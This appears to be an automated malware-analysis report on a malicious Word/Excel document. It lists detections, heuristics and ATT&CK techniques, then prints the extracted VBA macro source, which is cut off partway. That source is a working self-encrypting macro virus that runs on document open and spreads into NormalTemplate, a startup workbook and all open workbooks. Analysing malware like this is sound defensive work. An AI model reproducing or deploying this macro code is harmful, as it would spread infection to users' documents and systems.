MALICIOUS
420
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains a critical OLE_VBA_SHELL heuristic firing, indicating the presence of a Shell() call within its VBA macros. The VBA code also contains obfuscated logic that decrypts and executes further code, likely to download and run a secondary payload. This is further supported by ClamAV detections of 'Doc.Trojan.Codefore-1' and 'Doc.Trojan.Weete-1'.
Heuristics 9
-
ClamAV: Doc.Trojan.Codefore-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Codefore-1
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10450 bytes |
SHA-256: 4ba2865812bebb1932d46517474a58839294f0e747262d99b60cb7ded236cf8a |
|||
|
Detection
ClamAV:
Doc.Trojan.Weete-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Function c(s, k)
For l = 1 To Len(s): c = c & Chr(Asc(Mid(s, l, 1)) Xor k): Next
End Function
Private Sub Document_Open()
For b = 1 To 136: If Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(b, 1), 1, 1) = Chr(39) Then ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine b, c(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(b, 1), 2), Val(Mid(ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(140, 1), 2))) & Chr(39)
Next: w
End Sub
Private Sub Document_Close(): Document_Open: End Sub
Private Sub Workbook_Open()
For b = 1 To 136: If Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(b, 1), 1, 1) = Chr(39) Then ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.ReplaceLine b, c(Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(b, 1), 2), Val(Mid(ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(140, 1), 2))) & Chr(39)
Next: e
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean): Workbook_Open: End Sub
Private Sub w()
On Error Resume Next: st: bss '
Randomize: Set o = ThisDocument.VBProject.VBComponents(1).CodeModule '
o.ReplaceLine 140, Chr(39) & (211 + Int(Rnd * 39)) '
For l = 1 To 136 '
If Right(o.Lines(l, 1), 1) = Chr(39) Then o.ReplaceLine l, Left(Chr(39) & c(o.Lines(l, 1), Val(Mid(o.Lines(140, 1), 2))), Len(o.Lines(l, 1)) - 1) '
Next '
If ThisDocument = ActiveDocument Then Set h = NormalTemplate Else Set h = ActiveDocument '
With h.VBProject.VBComponents(1).CodeModule '
If .Lines(1, 1) <> "Private Function c(s, k)" Then '
.deletelines 1, .countoflines '
.InsertLines 1, o.Lines(1, 141) '
If h = ActiveDocument And ActiveDocument.Path <> "" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument '
End If '
End With '
ThisDocument.Save '
Set x = GetObject(, "excel.application") '
If x = "" Then Set x = CreateObject("excel.application"): q = True '
If UCase(Dir(x.Application.StartupPath & "\Mappe.")) <> "MAPPE" Then '
Set b = x.Workbooks.Add '
b.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.InsertLines 1, o.Lines(1, 141) '
j = "Cause it's a bitter sweet symphony that's life" '
b.SaveAs x.Application.StartupPath & "\Mappe.": b.Close '
End If '
If q = True Then x.Quit '
End Sub
Private Sub e()
On Error Resume Next: st: bst '
Randomize: Set o = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule '
o.ReplaceLine 140, Chr(39) & (211 + Int(Rnd * 39)) '
For l = 1 To 136 '
If Right(o.Lines(l, 1), 1) = Chr(39) Then o.ReplaceLine l, Left(Chr(39) & c(o.Lines(l, 1), Val(Mid(o.Lines(140, 1), 2))), Len(o.Lines(l, 1)) - 1) '
Next '
If UCase(Dir(Application.StartupPath & "\Mappe.")) <> "MAPPE" Then Workbooks.Add.SaveAs Application.StartupPath & "\Mappe." '
For Each t In Workbooks '
If t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 1) <> "Private Function c(s, k)" Then '
t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.deletelines 1, t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.countoflines '
t.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 141) '
If t.Path <> "" Then t.Save Else t.SaveAs t.FullName '
End If '
Next '
ThisWorkbook.Save '
Set x = GetObject(, "word.application") '
If x = "" Then Set x = CreateObject("word.application"): q = True '
If x.NormalTemplate.VB
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.